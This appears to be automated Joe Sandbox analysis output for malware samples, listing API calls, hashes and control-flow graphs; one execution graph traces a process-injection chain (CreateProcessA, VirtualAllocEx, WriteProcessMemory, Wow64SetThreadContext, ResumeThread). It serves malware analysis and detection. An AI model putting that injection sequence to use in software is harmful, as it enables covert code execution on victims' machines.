                                                                                                                                                                                                                                            • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                          • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                          • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                                                                                                                          • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(005AA8A8,00000000,00401AB4), ref: 00401A1B
                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,005AA8A8,00000000,00401AB4), ref: 00401A3A
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(005AB8A8,?,00000000,00008000,005AA8A8,00000000,00401AB4), ref: 00401A79
                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3782394904-0
                                                                                                                                                                                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitMessageProcess
                                                                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                                                                                                                                                                                          • API String ID: 1220098344-1503883590
                                                                                                                                                                                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 262959230-0
                                                                                                                                                                                                                                          • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                                                                                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                                                                                                          • String ID: )q@
                                                                                                                                                                                                                                          • API String ID: 3660427363-2284170586
                                                                                                                                                                                                                                          • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                                                                                                                                          • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Setup, xrefs: 00409CAD
                                                                                                                                                                                                                                          • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                                                                                                                                                          • API String ID: 2030045667-3271211647
                                                                                                                                                                                                                                          • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                                                                                                                                          • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CommandHandleLineModule
                                                                                                                                                                                                                                          • String ID: U1hd.@
                                                                                                                                                                                                                                          • API String ID: 2123368496-2904493091
                                                                                                                                                                                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1458359878-0
                                                                                                                                                                                                                                          • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                                                                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:6.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:6
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                          execution_graph 9318 434317 GetLocaleInfoW 9319 40ba15 9321 40ba28 9319->9321 9320 40bbfc 9321->9320 9322 40bbd9 CloseHandle 9321->9322 9322->9321 9317 430aec LoadLibraryW

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 11 434317-434373 GetLocaleInfoW
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000001.1628358661.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_401000_v7u3knm8W6_1U6jDWPH31qsx.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                          • Opcode ID: e406fee116d59dc29bff918de52f47113fca1f0b6cdf1c0b79daca21ffa03787
                                                                                                                                                                                                                                          • Instruction ID: 288d1a82559983365061ea63ee3f0ed70ff3cd0e29cd478b0d7a5142fe49a74e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e406fee116d59dc29bff918de52f47113fca1f0b6cdf1c0b79daca21ffa03787
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22015F78604704AFD700DF58C484A99BBF4FF4D364F018599E9898B361D371E944DF81

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 40ba15-40ba21 1 40ba28-40ba2c 0->1 2 40ba32-40ba36 1->2 3 40bbfc-40bc04 1->3 4 40bbf6 2->4 5 40ba3c-40ba40 2->5 8 40bbf7 4->8 6 40ba46-40ba4a 5->6 7 40bbd9-40bbf4 CloseHandle 5->7 6->4 9 40ba50-40bbd7 6->9 7->8 8->1 9->8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000001.1628358661.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_401000_v7u3knm8W6_1U6jDWPH31qsx.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4
                                                                                                                                                                                                                                          • API String ID: 0-4088798008
                                                                                                                                                                                                                                          • Opcode ID: 9e629b54cac9a451dd8cf4de9c3dc0aa672878143de544fc65e081d80f5981e0
                                                                                                                                                                                                                                          • Instruction ID: 06e1ceb854ef84b575a7962212db0659957610df23ecc174af10c1a64159b46f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e629b54cac9a451dd8cf4de9c3dc0aa672878143de544fc65e081d80f5981e0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E37148B8A04758DFCB10CF49D084A9EBBF0FB8D314F11855AE999AB360C374A945DF86

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 12 430aec-430b2b LoadLibraryW
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000001.1628358661.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_1_401000_v7u3knm8W6_1U6jDWPH31qsx.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 18444469ac8201bf6d50be6c6be0363dfdef2a52ebe0a6938612de2b41c52623
                                                                                                                                                                                                                                          • Instruction ID: d2283895444e6816146f9e0c787f061a4248d8bcf6bdef5045bd93e0b988b077
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18444469ac8201bf6d50be6c6be0363dfdef2a52ebe0a6938612de2b41c52623
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0A5B820170ADFCB04EF24C0C0946BBB6FB8A254B108694D9554B359D370EA85CBD1

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:10.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:96
                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                          execution_graph 6246 5a47c65 6250 5a489a8 6246->6250 6255 5a48998 6246->6255 6247 5a47a4e 6251 5a489c2 6250->6251 6261 5a469b0 6251->6261 6265 5a469b8 6251->6265 6252 5a489f4 6252->6247 6256 5a48905 6255->6256 6257 5a4899b 6255->6257 6256->6247 6259 5a469b0 Wow64SetThreadContext 6257->6259 6260 5a469b8 Wow64SetThreadContext 6257->6260 6258 5a489f4 6258->6247 6259->6258 6260->6258 6262 5a46a01 Wow64SetThreadContext 6261->6262 6264 5a46a79 6262->6264 6264->6252 6266 5a46a01 Wow64SetThreadContext 6265->6266 6268 5a46a79 6266->6268 6268->6252 6318 5a48135 6320 5a46c00 WriteProcessMemory 6318->6320 6321 5a46bfb WriteProcessMemory 6318->6321 6319 5a48159 6320->6319 6321->6319 6322 175dcc0 6325 175dd14 LoadLibraryA 6322->6325 6324 175dddb 6325->6324 6269 5a481cf 6273 5a48e18 6269->6273 6278 5a48e08 6269->6278 6270 5a481e7 6274 5a48e32 6273->6274 6276 5a469b0 Wow64SetThreadContext 6274->6276 6277 5a469b8 Wow64SetThreadContext 6274->6277 6275 5a48e64 6275->6270 6276->6275 6277->6275 6279 5a48df6 6278->6279 6280 5a48e12 6278->6280 6279->6270 6282 5a469b0 Wow64SetThreadContext 6280->6282 6283 5a469b8 Wow64SetThreadContext 6280->6283 6281 5a48e64 6281->6270 6282->6281 6283->6281 6326 175d9e8 6327 175da35 VirtualProtect 6326->6327 6328 175daa1 6327->6328 6329 175ede8 6330 175ee30 VirtualAlloc 6329->6330 6331 175ee9b 6330->6331 6284 5a47d4a 6288 5a46c00 6284->6288 6292 5a46bfb 6284->6292 6285 5a47a4e 6289 5a46c4c WriteProcessMemory 6288->6289 6291 5a46ce5 6289->6291 6291->6285 6293 5a46c00 WriteProcessMemory 6292->6293 6295 5a46ce5 6293->6295 6295->6285 6332 5a4839a 6333 5a483a3 6332->6333 6334 5a4750d 6332->6334 6334->6333 6338 5a46f7c 6334->6338 6342 5a46f88 6334->6342 6339 5a46f88 CreateProcessA 6338->6339 6341 5a47264 6339->6341 6343 5a4700f CreateProcessA 6342->6343 6345 5a47264 6343->6345 6296 5a479eb 6300 5a48a08 6296->6300 6305 5a48a18 6296->6305 6297 5a47a07 6301 5a48a18 6300->6301 6310 5a46ad8 6301->6310 6314 5a46ae0 6301->6314 6302 5a48a6d 6302->6297 6306 5a48a32 6305->6306 6308 5a46ae0 VirtualAllocEx 6306->6308 6309 5a46ad8 VirtualAllocEx 6306->6309 6307 5a48a6d 6307->6297 6308->6307 6309->6307 6311 5a46b24 VirtualAllocEx 6310->6311 6313 5a46b9c 6311->6313 6313->6302 6315 5a46b24 VirtualAllocEx 6314->6315 6317 5a46b9c 6315->6317 6317->6302 6346 5a4805b 6347 5a4762c 6346->6347 6348 5a48068 6346->6348 6354 5a48e88 6347->6354 6359 5a48e78 6347->6359 6349 5a4763f 6348->6349 6350 5a46c00 WriteProcessMemory 6348->6350 6351 5a46bfb WriteProcessMemory 6348->6351 6350->6349 6351->6349 6355 5a48ea2 6354->6355 6364 5a468c0 6355->6364 6368 5a468c8 6355->6368 6356 5a48ed1 6356->6349 6360 5a48e7d 6359->6360 6362 5a468c0 ResumeThread 6360->6362 6363 5a468c8 ResumeThread 6360->6363 6361 5a48ed1 6361->6349 6362->6361 6363->6361 6365 5a4690c ResumeThread 6364->6365 6367 5a46958 6365->6367 6367->6356 6369 5a4690c ResumeThread 6368->6369 6371 5a46958 6369->6371 6371->6356

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 251 5a46f7c-5a47021 254 5a47023-5a4703a 251->254 255 5a4706a-5a47092 251->255 254->255 258 5a4703c-5a47041 254->258 259 5a47094-5a470a8 255->259 260 5a470d8-5a4712e 255->260 261 5a47064-5a47067 258->261 262 5a47043-5a4704d 258->262 259->260 267 5a470aa-5a470af 259->267 269 5a47174-5a47262 CreateProcessA 260->269 270 5a47130-5a47144 260->270 261->255 263 5a47051-5a47060 262->263 264 5a4704f 262->264 263->263 268 5a47062 263->268 264->263 271 5a470b1-5a470bb 267->271 272 5a470d2-5a470d5 267->272 268->261 288 5a47264-5a4726a 269->288 289 5a4726b-5a47350 269->289 270->269 278 5a47146-5a4714b 270->278 273 5a470bd 271->273 274 5a470bf-5a470ce 271->274 272->260 273->274 274->274 277 5a470d0 274->277 277->272 280 5a4714d-5a47157 278->280 281 5a4716e-5a47171 278->281 282 5a47159 280->282 283 5a4715b-5a4716a 280->283 281->269 282->283 283->283 284 5a4716c 283->284 284->281 288->289 301 5a47360-5a47364 289->301 302 5a47352-5a47356 289->302 304 5a47374-5a47378 301->304 305 5a47366-5a4736a 301->305 302->301 303 5a47358 302->303 303->301 307 5a47388-5a4738c 304->307 308 5a4737a-5a4737e 304->308 305->304 306 5a4736c 305->306 306->304 309 5a473c2-5a47415 307->309 310 5a4738e-5a473a4 307->310 308->307 311 5a47380 308->311 316 5a47397-5a473a4 309->316 317 5a47417-5a47449 309->317 314 5a473ab-5a473b7 310->314 311->307 314->309 316->314 318 5a47450-5a47475 317->318 319 5a4744b 317->319 320 5a47490-5a47494 318->320 319->318 321 5a47496-5a474a1 320->321 322 5a47477-5a47489 320->322 323 5a4848c-5a48495 321->323 322->320 324 5a4748b 322->324 325 5a48497 323->325 326 5a4849e-5a484a9 323->326 324->320 325->325 326->323
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A4724F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                          • Opcode ID: 1009e22bb1a631b8529c2de560a93355d806abc9713ecbd5bfcc39db7d2bd118
                                                                                                                                                                                                                                          • Instruction ID: 93437513ebe398077c60f7303e38537cb83a54b31c0910164918dbe39d9c96a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1009e22bb1a631b8529c2de560a93355d806abc9713ecbd5bfcc39db7d2bd118
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BC11771D012698FDB24CFA8C845BEEBBF1FB49300F0095A9D819B7250DB749A86CF95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
